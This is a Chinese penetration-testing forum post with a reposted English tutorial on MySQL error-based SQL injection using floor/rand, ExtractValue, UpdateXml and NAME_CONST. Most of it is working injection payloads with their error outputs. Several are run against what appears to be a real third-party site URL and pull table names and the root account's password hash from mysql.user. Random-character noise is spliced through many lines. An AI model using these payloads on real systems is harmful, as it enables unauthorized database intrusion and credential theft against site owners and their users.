中国网络渗透测试联盟

标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]

作者: admin    时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
( B1 u( L$ h& c' l/ q" F" r首先进行正常查询:

mysql> select * from article where id = 1;9 Z4 Z4 [  J- w8 \/ y* ?' f
+—-+——-+———+5 Z1 w# X- d& ~" c6 h
| id | title | content |
! L  Y- A! h0 @) L" N- ~$ i: R+—-+——-+———+
( b8 ^8 t3 m( [. q$ G4 D& }|  1 | test  | do it   |
& S' \: `% L7 y# E' r# _/ K# t* e+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
2 D5 [' u+ |$ i* J( T& KERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。5 [( P" U4 Y. G# _
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
( G. ^4 ^9 a* r  d7 H. ]ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));. Y8 ?& G6 |: x1 u" W& J
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue% A. y. J# i2 \# c* P
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
" l" j; }2 n3 \8 N' W; T( c, HERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

/ \7 t: _, s) e' c6 N/ [# }
4 }- I8 T" |2 @: y

再收集:


: X) V  F* W# ~- p! P: N& ?6 Zhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) " B+ x8 H3 i! K3 h1 o
. k1 m" X6 w8 L0 l
Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
* h7 ]3 Y3 x% i, q$ r) {$ B  R4 H  K; |8 i; I$ F
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
5 b( `* a3 X# h# z7 Z. s) j8 N* r% \, s7 _5 p# L
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
! [) V: D* |9 h! r6 m$ }  M% m7 ]# {  H' ~7 R, [1 s
MYSQL高版本报错注入技巧-利用NAME_CONST注入
/ n% \" Y8 W* m/ o0 t% KIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. - f3 z' H9 K* Y3 ?( c* o& t

+ b4 L5 J) v5 x7 Y9 M
8 H% L) k/ ~* m9 E: J0 t相关信息! s1 X& {) p* s+ p$ ~$ s

& R" z0 [" k0 {5 d& y9 A& ^, W% DNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.8 J, I$ B7 G  H( ^$ [: P8 A; w
/ j+ b) o8 ~9 K8 Z9 o) O
Code:1 z6 ~! m2 O6 ~7 y4 ^
NAME_CONST(DATA, VALUE)
5 k, H4 m; I9 _% ]  G7 n* m
- G) {6 Z8 t$ j9 RReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
, W$ H. ^9 [* k8 }1 G6 j
# t8 C- Y# \9 p  T3 ]0 OSELECT NAME_CONST('TEST', 1)3 R# a# {9 o8 c/ B- g
" }( w- f+ ?: q, _" v) e; L& K/ x

7 M( ], [8 o/ W' m  _( \! X* {/ p; U9 W) A1 I+ O
|---------------|' c: J$ i$ p/ @) p- ^
|     TEST      |
9 z8 Q8 I) H, U% n" [|               |
- b( [1 O+ D3 p# Q: r( D4 j  o) \|---------------|
9 P9 i5 ^0 x: u/ Q& z! ]|       1       |1 f7 I7 C3 A0 U; v
|               |. Z3 b; \2 t3 [, U. R4 ?4 ]
|---------------|
/ V) E* P  o+ Y2 ~' @/ c- l+ E

! ?% ^+ Y: b$ C' ?
5 {8 C+ A3 a4 f! S' [6 b+ u8 s4 c; c+ O/ Z

* G$ ]8 F) F* D1 \http://dev.mysql.com/doc/refman/5.0/en/m...name-const
) m3 U5 n/ M' c9 nIntro to MySQL Variables
( _5 e9 {) f  h/ g7 Q. f
$ {* Y1 s" z/ }0 T! |. nOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
# R# U# o. w2 c1 [. Y3 C( Q) a2 O+ ^! s" [
Code:5 I/ f( a% l" X! u2 R9 Z' T7 Z* g
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
  I0 \. o& T5 K) L1 [# }( y6 ?! F( C, y. M  p; P# w

6 W" |$ e/ m0 r( ^2 L
5 g; l$ I5 X3 [
7 q) ]* c5 ]" g# b1 u+ I( U
* D6 L) s. Z$ s; S* S% ^
Code:
9 T/ {" F5 T& o" j2 _6 ?and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--( \/ r$ i9 M3 B5 {

( C0 H; |8 F0 B0 X
" ?. q6 u' \/ V; m2 G% K/ tVAR = Your MySQL variable.
( _7 A+ i! r4 Y2 q4 \: v3 u( O+ n* ]0 X9 r; E$ f
MySQL 5.1.3 Server System Variables8 X5 X: w2 r+ Y
, m+ x, n3 z" i6 `$ d% l
Let's try it out on my site..1 i  s; Z: ~$ F0 n2 ~9 C: t/ S
+ k" \# l3 b8 `8 o
Code:
+ s/ f) |' K5 @3 ?5 ]3 z3 rhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
& E8 p6 f+ ]; h/ I  v/ D0 L  k
1 H" v) u  @! P- O3 O1 dErroruplicate column name '5.0.27-community-nt'
- K+ m" D! D3 s( z6 X+ w

; h* e  X- o( A: v# [6 @. x7 ~0 n% _, f) O! ^2 J4 X
, o5 t+ n( g- O( E# b3 G7 R
& g; t. h+ F7 b% L- |+ H( B

2 b% W3 t% |! {( HNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...( \6 @0 ^3 s5 |# E' Q2 s" U
( N9 I5 C6 W0 J3 l9 o. n
Data Extraction
0 _5 W* v9 N/ E; w2 t' I0 u9 b( Z+ g5 M
Code:- ]/ j7 |4 @2 ~! g
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--* u( [' z$ @6 s* ?# M

7 V7 _7 ?% x- t, `3 p
7 Z) A5 E/ x) `+ A" L* N5 f1 uWe should get a duplicate column 1 error...
9 p3 I6 u- T$ k) i" V% m' @& p% e* B/ V7 K- v1 |" x- X" b, c
Code:8 `" |5 l6 ?( x' ?; E! B
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--# i4 ~8 A4 k3 {, b2 y, W6 U
* a' P. q: G" Y' P5 P; A+ Z0 |
Erroruplicate column name '1
  w! |9 J8 S( E3 r, u

, L2 `7 E3 @2 x8 k6 a! V: {
4 W0 B1 D! f, M8 W2 y$ z+ I$ |3 @8 L) S/ _/ I
8 m& }. ~* n" i) f5 R
& P& E& O2 t' B, s8 f0 B2 L+ \7 U. D
; N! K9 P5 J( _: C. T3 @- S
Now let's get the tables out this bitch..
/ j6 A+ r9 m6 Y; H% H* q  i/ y4 s/ F4 l9 F  {! b1 n
Code:( U& ?% c/ Y" H4 i3 n
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--  D1 P, B8 ]7 S& Y  ]

" Q4 W* f" W3 q6 l; ]. J
! @1 m  G6 K7 ^0 A: |! o6 cLet's see if it works here, if it does, we can go on and finish the job.! k6 k) w0 b' k; h; d0 i& `
" G- e2 @1 v8 F/ I& g& P
Code:
% I) U! ?0 m7 c  \. Yhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--5 a% i& o4 `' B) l" z
+ f$ P% o& g1 I$ n; A8 r! b, b
7 |- @" `2 A. i. Y7 O/ S( n
Erroruplicate column name 'com_admanage
1 v. O" g5 {! ~# p( r: U
6 m) c, Y: y% K
! ?" K/ i# }1 Z; b0 a/ e
! X" V0 k/ Q! u
' H6 q0 l$ x/ j" `- o! ^7 \

9 f9 G4 [9 w7 ]  z. K) Z& J/ c) d  \3 d
5 \" m1 G4 o/ _Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.3 U- j# u; Y: H  {. B

; Z, z. e( L/ m4 J/ R$ P) nLet's get the columns out of the user table..& @, o* p2 M7 D& ~8 `5 ?* n3 l; y

& K7 L! N5 {' g+ e% aCode:& R; {5 `1 v+ X8 s
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--" P- j  J  e7 L6 l5 U; y0 r
- c( u: o+ R- v- T0 w. H- f1 [

; Z( j, f- c& k' U4 W  oSo mine looks like this, and I get the duplicate column name 'Host'.5 e# I5 m8 J6 A; h/ M' G5 D

, U- x( t3 X/ X% ?2 |Code:
' L) q$ G  Y* ~: K9 Bhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
- f4 X+ \2 x) P+ I$ y6 A6 g7 M5 P! ^$ H7 ]4 f6 M
Erroruplicate column name 'Host'
4 v7 x" r6 y! S6 O+ U3 ]) t
* o; C& h$ n$ e4 e1 R; M. m

$ U" _9 r* O) V! V; e# ~3 M* m; a: X( `7 b7 y! `
. n; v' Y# S4 d2 q0 k- s- }5 Z+ b% ?# g( R0 |

! X7 F6 Q: a% W5 i* ^$ e. d- d2 [% A+ c9 ~- d$ w2 e7 |
Woot, time to finish this bitch off.
+ O1 C$ {) z$ M% x/ i
" N7 ]  @- _# w+ RCode:- [, c  f# L9 A0 M- L, U- y
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
1 e8 g: H6 ^. x% Y  G
7 y; X7 D% c' \
+ X# M( ~5 Q5 p9 q. f
So mine looks like this...
+ Q+ q- [: T) }& x2 ?4 n
7 O* R7 W9 V0 I4 `9 N" t  BCode:
9 N& j/ \7 |" f/ F9 ~8 |1 K" ohttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--: \; {8 m" B% Q
7 h! R& U6 o1 b% U& z% }' c3 H( N
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
6 t/ P2 m2 s. p  t/ o

7 D9 j# o% _- ~7 W
% }: u6 |, a7 k+ s$ x, C ( L6 Y6 Z) W+ L% M2 p

0 H# O. M% `5 h3 e' p
" @4 \# C" `, F% H% `' @" C

* N1 o$ D5 Q  d( E( z% YAnd there we have it, thanks for reading.
2 h1 V* T2 b$ E, y4 I# C4 T/ x" [

. O1 P) q6 N  w5 K( t9 a; F




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2